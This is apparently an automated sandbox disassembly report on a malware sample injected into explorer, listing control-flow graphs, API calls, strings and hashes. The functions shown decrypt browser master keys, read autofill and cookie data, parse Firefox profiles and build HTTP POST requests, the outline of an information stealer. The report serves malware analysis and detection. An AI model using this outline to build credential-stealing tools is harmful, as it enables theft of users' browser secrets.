                                                                                            • Opcode ID: fb93a90e4b946c866358a17dbc2f51fc68354cd6b567ec0dce0c27fec2188d3e
                                                                                            • Instruction ID: e98d77187f36e5130bd8a58413d199ac43786fa4f3eaf2f55c3d37e0136ea0d6
                                                                                            • Opcode Fuzzy Hash: fb93a90e4b946c866358a17dbc2f51fc68354cd6b567ec0dce0c27fec2188d3e
                                                                                            • Instruction Fuzzy Hash: 5F31B4303053865BDB54AB328CA997F63DFAB85B05F14853CB845C7282EF7CCD45A269

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 531 6e1d4a-6e1d5c 532 6e1eb4-6e1ebe 531->532 533 6e1d62-6e1d66 531->533 533->532 534 6e1d6c-6e1d77 call 6e19b4 533->534 537 6e1d8b-6e1d97 call 6e1953 534->537 538 6e1d79-6e1d89 call 6e1953 534->538 543 6e1d9b-6e1d9d 537->543 538->543 543->532 544 6e1da3-6e1db4 FindFirstFileW 543->544 545 6e1ead-6e1eaf call 6e1011 544->545 546 6e1dba 544->546 545->532 548 6e1dbe-6e1dc3 546->548 549 6e1e3d-6e1e6a call 6e1953 call 6e199d lstrcmpiW 548->549 550 6e1dc5-6e1dd7 lstrcmpiW 548->550 561 6e1e6c-6e1e75 call 6e1cf7 549->561 562 6e1e87-6e1e89 call 6e1011 549->562 552 6e1e8e-6e1e9c FindNextFileW 550->552 553 6e1ddd-6e1def lstrcmpiW 550->553 552->548 554 6e1ea2-6e1ea9 FindClose 552->554 553->552 556 6e1df5-6e1e00 call 6e19b4 553->556 554->545 563 6e1e09 556->563 564 6e1e02-6e1e07 556->564 561->562 570 6e1e77-6e1e7f 561->570 562->552 566 6e1e0b-6e1e3b call 6e1953 call 6e199d call 6e1d4a 563->566 564->566 566->562 570->562
                                                                                            APIs
                                                                                              • Part of subcall function 006E19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,006E2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 006E19C4
                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 006E1DA9
                                                                                            • lstrcmpiW.KERNEL32(?,007362CC), ref: 006E1DCF
                                                                                            • lstrcmpiW.KERNEL32(?,007362D0), ref: 006E1DE7
                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 006E1E62
                                                                                              • Part of subcall function 006E1CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,006E2C27), ref: 006E1D02
                                                                                              • Part of subcall function 006E1CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 006E1D0D
                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 006E1E94
                                                                                            • FindClose.KERNELBASE(00000000), ref: 006E1EA3
                                                                                              • Part of subcall function 006E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
                                                                                              • Part of subcall function 006E1953: lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
                                                                                              • Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
                                                                                              • Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                            • String ID: *.*$\*.*
                                                                                            • API String ID: 232625764-1692270452
                                                                                            • Opcode ID: b0e063b45b4c8f2698a5a8a64c2e86a23d1bcb1a845221ad1db8e17ea07828bc
                                                                                            • Instruction ID: fd98085c021f9774e703884b4474e6ab7b4ea52116ab90cfcf19e518b227cbd3
                                                                                            • Opcode Fuzzy Hash: b0e063b45b4c8f2698a5a8a64c2e86a23d1bcb1a845221ad1db8e17ea07828bc
                                                                                            • Instruction Fuzzy Hash: C631D7303053815BDB24AB328899EAF76EBAFC6301F04852CF9468B356EB34CC05A655

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 689 6e3e04-6e3e11 call 6e1b6a 692 6e3e17-6e3e22 call 6e1c31 689->692 693 6e3ed4-6e3ed8 689->693 692->693 696 6e3e28-6e3e34 call 6e2fb1 692->696 699 6e3e3a-6e3e4f call 6e123b 696->699 700 6e3ec8-6e3ecc 696->700 703 6e3ec0-6e3ec7 call 6e1011 699->703 704 6e3e51-6e3e58 699->704 700->693 703->700 706 6e3ebf 704->706 707 6e3e5a-6e3e6a 704->707 706->703 709 6e3e6c-6e3e7c RtlCompareMemory 707->709 710 6e3eb8-6e3eba call 6e1011 707->710 709->710 711 6e3e7e-6e3ea6 CryptUnprotectData 709->711 710->706 711->710 713 6e3ea8-6e3ead 711->713 713->710 714 6e3eaf-6e3eb3 713->714 714->710
                                                                                            APIs
                                                                                              • Part of subcall function 006E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,006E2893,00000000,00000000,00000000,?), ref: 006E1B82
                                                                                              • Part of subcall function 006E1B6A: CloseHandle.KERNELBASE(00000000), ref: 006E1B8F
                                                                                              • Part of subcall function 006E1C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,006E3E1E,00000000,?,006E3FA8), ref: 006E1C46
                                                                                              • Part of subcall function 006E1C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,006E3FA8), ref: 006E1C56
                                                                                              • Part of subcall function 006E1C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,006E3FA8), ref: 006E1C76
                                                                                              • Part of subcall function 006E1C31: CloseHandle.KERNELBASE(00000000,?,006E3FA8), ref: 006E1C91
                                                                                              • Part of subcall function 006E2FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,006E3E30,00000000,00000000,?,006E3FA8), ref: 006E2FC1
                                                                                              • Part of subcall function 006E2FB1: lstrlen.KERNEL32("encrypted_key":",?,006E3FA8), ref: 006E2FCE
                                                                                              • Part of subcall function 006E2FB1: StrStrIA.SHLWAPI("encrypted_key":",0073692C,?,006E3FA8), ref: 006E2FDD
                                                                                              • Part of subcall function 006E123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,006E3E4B,00000000), ref: 006E124A
                                                                                              • Part of subcall function 006E123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006E1268
                                                                                              • Part of subcall function 006E123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006E1295
                                                                                            • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 006E3E74
                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006E3E9E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                            • String ID: $DPAP$DPAP$IDPAP
                                                                                            • API String ID: 3076719866-957854035
                                                                                            • Opcode ID: 21814550b09f1b7e6b6ef76842d03c31cc286cfae418d3f6cfe410072202dd61
                                                                                            • Instruction ID: cbd404f89172277b4e40248d3d0817a9428b9762f553a5483014e1dc7ee90b23
                                                                                            • Opcode Fuzzy Hash: 21814550b09f1b7e6b6ef76842d03c31cc286cfae418d3f6cfe410072202dd61
                                                                                            • Instruction Fuzzy Hash: FC2192726063956BD721EA668C84ABFB7DEAB84700F44052EF841CB301EF74CE4987D6
                                                                                            APIs
                                                                                              • Part of subcall function 006E1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 006E116F
                                                                                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 006E4BB6
                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF), ref: 006E4BBF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1675517319-0
                                                                                            • Opcode ID: b30c2ad36f8962a046b9e6ee6b97ccecfd610f7747b20ef1ceb8c93dffea5726
                                                                                            • Instruction ID: 9b444287c071ec998e1a33d5dfe148b82bc443f651c9ee474a28418013c9b3ff
                                                                                            • Opcode Fuzzy Hash: b30c2ad36f8962a046b9e6ee6b97ccecfd610f7747b20ef1ceb8c93dffea5726
                                                                                            • Instruction Fuzzy Hash: 2BE0D83190739067C7987B32BC0DE8B3B5B9F92361F10C91DB25586190CF36C8418668
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(007420A4,00000001,00000000,0000000A,00733127,006E28DA,00000000,?), ref: 006EBFFC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 342ae006ccbddde6d99fee0480ed66ad17038b3f9da80c53f6b54561cc8af586
                                                                                            • Instruction ID: 701ec3f1d99456005f87ca56fe1de9ac258226ef5df55f974011c651c2b8a2a0
                                                                                            • Opcode Fuzzy Hash: 342ae006ccbddde6d99fee0480ed66ad17038b3f9da80c53f6b54561cc8af586
                                                                                            • Instruction Fuzzy Hash: 65E012717C638075E69037BAEC07F9B15574BA1F91FE08529B610A91CEDBA99181102A

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 006E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,006E2893,00000000,00000000,00000000,?), ref: 006E1B82
                                                                                              • Part of subcall function 006E1B6A: CloseHandle.KERNELBASE(00000000), ref: 006E1B8F
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                            • GetTempPathW.KERNEL32(00000104,00000000), ref: 006E3C6A
                                                                                            • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 006E3C76
                                                                                            • DeleteFileW.KERNELBASE(00000000), ref: 006E3C7D
                                                                                            • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 006E3C89
                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 006E3D2F
                                                                                            • lstrlen.KERNEL32(00000000), ref: 006E3D36
                                                                                            • wsprintfA.USER32 ref: 006E3D55
                                                                                            • lstrlen.KERNEL32(00000000), ref: 006E3D61
                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 006E3D89
                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 006E3DB2
                                                                                            • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 006E3DED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                            • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                            • API String ID: 2923052733-3488123210
                                                                                            • Opcode ID: 653a620d5f77dfc0eb92f9f53983bdda69aafadaae7863b3836c58d7839d0d11
                                                                                            • Instruction ID: 13100714e721818115832893ce7566637e647a457e9195610108b71e6bb03f6d
                                                                                            • Opcode Fuzzy Hash: 653a620d5f77dfc0eb92f9f53983bdda69aafadaae7863b3836c58d7839d0d11
                                                                                            • Instruction Fuzzy Hash: A141E430605395ABE710AB32CC85D7F76AFEF86745F00882CF441A7352DA39DD059B66

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 348 6e28f8-6e28fa 349 6e2ac8-6e2ada call 733848 DeleteFileW call 6e1011 348->349 350 6e2900-6e291c call 6e1000 call 7002ec 348->350 358 6e2adf-6e2ae6 349->358 359 6e2a8f-6e2aa2 call 6ffb92 lstrlen 350->359 360 6e2922-6e293a call 6e1fa7 350->360 367 6e2aa4-6e2abc call 6e1798 * 3 359->367 368 6e2ac1-6e2ac3 call 6e1011 359->368 365 6e293c-6e2942 360->365 366 6e2948-6e295f call 6e1fa7 360->366 365->366 370 6e2944 365->370 376 6e296d-6e2984 call 6e1fa7 366->376 377 6e2961-6e2967 366->377 367->368 368->349 370->366 383 6e2986-6e298c 376->383 384 6e2992-6e29a7 call 6e1fa7 376->384 377->376 379 6e2969 377->379 379->376 383->384 386 6e298e 383->386 388 6e29a9-6e29af 384->388 389 6e29b5-6e29cc call 6e1fa7 384->389 386->384 388->389 390 6e29b1 388->390 393 6e29ce-6e29d4 389->393 394 6e29da-6e29e5 lstrlen 389->394 390->389 393->394 395 6e29d6 393->395 396 6e29eb-6e29f0 lstrlen 394->396 397 6e2a79-6e2a85 call 7002ec 394->397 395->394 396->397 399 6e29f6-6e2a11 call 6e1000 396->399 397->360 402 6e2a8b 397->402 404 6e2a1b-6e2a56 call 6e2112 wsprintfA lstrlen 399->404 405 6e2a13 399->405 402->359 408 6e2a6a-6e2a74 lstrcat call 6e1011 404->408 409 6e2a58-6e2a68 call 6e102f 404->409 405->404 408->397 409->408
                                                                                            APIs
                                                                                            • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 006E2AD2
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 006E29E1
                                                                                            • lstrlen.KERNEL32(00000000), ref: 006E29EC
                                                                                            • wsprintfA.USER32 ref: 006E2A38
                                                                                            • lstrlen.KERNEL32(00000000), ref: 006E2A44
                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E2A6C
                                                                                            • lstrlen.KERNEL32(00000000,?,?), ref: 006E2A99
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                            • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                            • API String ID: 304071051-2605711689
                                                                                            • Opcode ID: 6dcce1e7527195c79b45f56fb4d216a169b07683a9ea59d842e2d6142aba48dc
                                                                                            • Instruction ID: ee855d84588c43cc6b2cc820128578134b113eea89fedc8044f1cb332f1a7780
                                                                                            • Opcode Fuzzy Hash: 6dcce1e7527195c79b45f56fb4d216a169b07683a9ea59d842e2d6142aba48dc
                                                                                            • Instruction Fuzzy Hash: CD51D1306063C79BD725EF2288A1A7E76DBAF86305F04482CF4819B253DB39CC459766

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 484 6e2cb5-6e2cc7 call 6e1953 488 6e2ccd-6e2d06 call 6e1953 call 6e1000 * 2 call 6e1b6a 484->488 489 6e2e17-6e2e2d call 6e2ae9 484->489 500 6e2d0c-6e2d1c GetPrivateProfileSectionNamesW 488->500 501 6e2df9-6e2e12 call 6e1011 * 4 488->501 500->501 503 6e2d22-6e2d26 500->503 501->489 505 6e2d2c-6e2d32 503->505 506 6e2df5 503->506 507 6e2d36-6e2d39 505->507 506->501 509 6e2d3f-6e2d4d StrStrIW 507->509 510 6e2ded-6e2df1 507->510 512 6e2dd7-6e2de7 lstrlenW 509->512 513 6e2d53-6e2d70 GetPrivateProfileStringW 509->513 510->506 512->507 512->510 513->512 515 6e2d72-6e2d88 GetPrivateProfileIntW 513->515 517 6e2dcc-6e2dd2 call 6e2ae9 515->517 518 6e2d8a-6e2d9c call 6e1953 515->518 517->512 523 6e2d9e-6e2da2 518->523 524 6e2db4-6e2dca call 6e2ae9 call 6e1011 518->524 525 6e2dac-6e2db2 523->525 526 6e2da4-6e2daa 523->526 524->512 525->523 525->524 526->525
                                                                                            APIs
                                                                                              • Part of subcall function 006E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
                                                                                              • Part of subcall function 006E1953: lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
                                                                                              • Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
                                                                                              • Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                              • Part of subcall function 006E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,006E2893,00000000,00000000,00000000,?), ref: 006E1B82
                                                                                              • Part of subcall function 006E1B6A: CloseHandle.KERNELBASE(00000000), ref: 006E1B8F
                                                                                            • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 006E2D13
                                                                                            • StrStrIW.SHLWAPI(00000000,Profile), ref: 006E2D45
                                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,Path,0073637C,?,00000FFF,?), ref: 006E2D68
                                                                                            • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 006E2D7B
                                                                                            • lstrlenW.KERNEL32(00000000), ref: 006E2DD8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                            • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                            • API String ID: 2234428054-4107377610
                                                                                            • Opcode ID: 3c2691cba5ddb76330f773d32f2c66458c6b71137abcfce1d0c9a23b4a691da9
                                                                                            • Instruction ID: dc3ecc6faafa7d3bf89c674c0dbfb83404c5de8285d17f4a564f4850e00a6d89
                                                                                            • Opcode Fuzzy Hash: 3c2691cba5ddb76330f773d32f2c66458c6b71137abcfce1d0c9a23b4a691da9
                                                                                            • Instruction Fuzzy Hash: FC3192307053825BD764AF328C2166F76A7AFC9700F10843DFA45AB392DE798C469756

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 576 6e1333-6e1385 call 6e1000 call 6e106c call 6e12a3 583 6e1387-6e139e 576->583 584 6e13a0-6e13a3 576->584 587 6e13b0-6e13b2 583->587 586 6e13aa-6e13ac 584->586 586->587 588 6e15cb-6e15da call 6e1011 587->588 589 6e13b8-6e13ef RtlZeroMemory 587->589 593 6e13f5-6e141a 589->593 594 6e15c3-6e15ca 589->594 597 6e15bf 593->597 598 6e1420-6e1456 call 6e10b1 593->598 594->588 597->594 601 6e145d-6e1478 598->601 602 6e1458 598->602 604 6e147e-6e1483 601->604 605 6e15b5 601->605 602->601 606 6e149d-6e14c7 call 6e1000 wsprintfW 604->606 607 6e1485-6e1496 604->607 605->597 610 6e14c9-6e14cb 606->610 611 6e14e0-6e1509 606->611 607->606 612 6e14cc-6e14cf 610->612 618 6e150f-6e151b 611->618 619 6e15a5 611->619 613 6e14da-6e14dc 612->613 614 6e14d1-6e14d6 612->614 613->611 614->612 616 6e14d8 614->616 616->611 618->619 623 6e1521-6e1537 call 6e1000 618->623 620 6e15ac-6e15b0 call 6e1011 619->620 620->605 626 6e1539-6e1544 623->626 627 6e1558-6e156f 626->627 628 6e1546-6e1553 call 6e102f 626->628 632 6e1573-6e157d 627->632 633 6e1571 627->633 628->627 632->626 634 6e157f-6e1583 632->634 633->632 635 6e159a-6e15a1 call 6e1011 634->635 636 6e1585 call 6e104c 634->636 635->619 639 6e158a-6e1594 RtlMoveMemory 636->639 639->635
                                                                                            APIs
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                              • Part of subcall function 006E106C: lstrlen.KERNEL32(02FF710E,00000000,00000000,00000000,006E1366,75918A60,02FF710E,00000000), ref: 006E1074
                                                                                              • Part of subcall function 006E106C: MultiByteToWideChar.KERNEL32(00000000,00000000,02FF710E,00000001,00000000,00000000), ref: 006E1086
                                                                                              • Part of subcall function 006E12A3: RtlZeroMemory.NTDLL(?,00000018), ref: 006E12B5
                                                                                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 006E13C2
                                                                                            • wsprintfW.USER32 ref: 006E14B5
                                                                                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 006E1594
                                                                                            Strings
                                                                                            • Content-Type: application/x-www-form-urlencoded, xrefs: 006E14FB
                                                                                            • POST, xrefs: 006E1465
                                                                                            • Accept: */*Referer: %S, xrefs: 006E14AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                            • API String ID: 3833683434-704803497
                                                                                            • Opcode ID: 04d02000598993678688d28c929897cacfe90da5d58fb7a9621ec389f12c9a5f
                                                                                            • Instruction ID: 911376b14cea50873f3789db3118ee50e09b96f85ed7c4a0eb9db1144ee0f699
                                                                                            • Opcode Fuzzy Hash: 04d02000598993678688d28c929897cacfe90da5d58fb7a9621ec389f12c9a5f
                                                                                            • Instruction Fuzzy Hash: 9A719AB1609385AFE7109F25DC84A6BBBEAFB89344F00892DF941CB351DB34CE049B56

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 641 6ea40e-6ea424 642 6ea426-6ea42a 641->642 643 6ea4a2-6ea4aa 641->643 645 6ea42c-6ea42f 642->645 646 6ea431-6ea441 642->646 644 6ea4ae-6ea4c8 643->644 647 6ea4cc-6ea4d8 644->647 645->643 645->646 648 6ea469-6ea4a0 memcpy 646->648 649 6ea443 646->649 653 6ea4e1-6ea4e3 647->653 648->644 650 6ea44a-6ea45a memcpy 649->650 651 6ea445-6ea448 649->651 652 6ea45d 650->652 651->648 651->650 654 6ea45f-6ea466 652->654 655 6ea524-6ea538 call 6ea2aa 653->655 656 6ea4e5-6ea4ee 653->656 655->652 660 6ea53e-6ea553 memset 655->660 656->655 661 6ea4f0-6ea4ff call 6ea250 656->661 660->654 661->647 664 6ea501-6ea51f call 6ea1c6 661->664 664->654
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$FileReadmemset
                                                                                            • String ID: winRead$Ss
                                                                                            • API String ID: 2051157613-1370720004
                                                                                            • Opcode ID: 3c4c5b452333d57c5713253cad829c9ee36210e6dfe42086905bfe13711b2d68
                                                                                            • Instruction ID: a053ffb4b209abd8fdf239c6edd760bfe5e2fbc5222e3dc1a9e3a474ab18689c
                                                                                            • Opcode Fuzzy Hash: 3c4c5b452333d57c5713253cad829c9ee36210e6dfe42086905bfe13711b2d68
                                                                                            • Instruction Fuzzy Hash: AC31897220A380EBD740DE99CC8599F77E7EFC4310F845928F98587251E270ED058B93

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 667 6ea67c-6ea692 668 6ea694-6ea6bf _alldiv _allmul 667->668 669 6ea6c1-6ea6c4 667->669 670 6ea6c7-6ea6d2 call 6ea33b 668->670 669->670 673 6ea6d4-6ea6df 670->673 674 6ea6f0 670->674 675 6ea6e4-6ea6ee call 6ea1c6 673->675 676 6ea6f9-6ea6fb 674->676 681 6ea722-6ea726 675->681 678 6ea71e 676->678 679 6ea6fd-6ea708 676->679 678->681 679->678 685 6ea70a-6ea71c 679->685 683 6ea73a-6ea740 681->683 684 6ea728-6ea72b 681->684 684->683 686 6ea72d 684->686 685->675 687 6ea72f-6ea732 686->687 688 6ea734-6ea737 686->688 687->683 687->688 688->683
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File_alldiv_allmul
                                                                                            • String ID: @Ts$winTruncate1$winTruncate2
                                                                                            • API String ID: 3568847005-2922925224
                                                                                            • Opcode ID: 72edf3f2c0d54819e5ea43fd690f5ba89548cb9cfff309111bdac35d9b4fb6dd
                                                                                            • Instruction ID: 1da53c2650cf2ae964078bad6c16d3cdd054d50ca905b3bb4b68ed7365f0b2c0
                                                                                            • Opcode Fuzzy Hash: 72edf3f2c0d54819e5ea43fd690f5ba89548cb9cfff309111bdac35d9b4fb6dd
                                                                                            • Instruction Fuzzy Hash: C121D075202380ABDF54CEAACC85EA737AAEF85310F158169FD44CB246D634EC40CBA2

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 715 6eb87b-6eb88a 716 6eb88d-6eb8e3 memset 715->716 717 6eb8e5-6eb8f3 call 6eb64b 716->717 718 6eb903 716->718 723 6eb8f9-6eb901 717->723 724 6ebaf3-6ebaf9 717->724 720 6eb905-6eb914 call 6eb609 718->720 726 6eb91a-6eb923 call 6eb828 720->726 727 6ebae3 720->727 723->720 733 6eb929-6eb941 726->733 734 6ebad6-6ebae1 call 6e68ec 726->734 728 6ebae8-6ebaf1 call 6e68ec 727->728 728->724 736 6eb946-6eb94d 733->736 737 6eb943-6eb944 733->737 734->728 739 6eb950-6eb962 736->739 737->739 740 6eb965-6eb96e 739->740 741 6eb975-6eb97c 740->741 742 6eb97e-6eb983 741->742 743 6eb9cb-6eb9e4 call 6ea2aa 741->743 745 6eb9b6-6eb9c9 call 6ea250 742->745 746 6eb985-6eb9aa call 6e6614 call 6ebb9f call 6e6620 742->746 750 6eb9e6-6eb9fd call 6e68ec * 2 743->750 751 6eba41-6eba46 743->751 745->740 745->743 770 6eb9ac-6eb9b0 746->770 771 6eb9b2 746->771 768 6eb9ff-6eba04 750->768 769 6eba14-6eba3c call 6ea1c6 call 734db2 750->769 754 6eba48-6eba52 751->754 755 6eba54-6eba6e call 6e68ec * 2 751->755 754->755 772 6eba74 755->772 773 6eba70-6eba72 755->773 768->769 774 6eba06-6eba0f 768->774 769->724 770->743 770->771 771->745 776 6eba79-6eba8a 772->776 773->776 774->716 778 6eba8c 776->778 779 6eba90-6ebaa2 call 7352ae 776->779 778->779 784 6ebaa8-6ebad4 779->784 785 6ebaa4 779->785 784->724 785->784
                                                                                            APIs
                                                                                            • memset.NTDLL ref: 006EB8D5
                                                                                            • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 006EB96F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
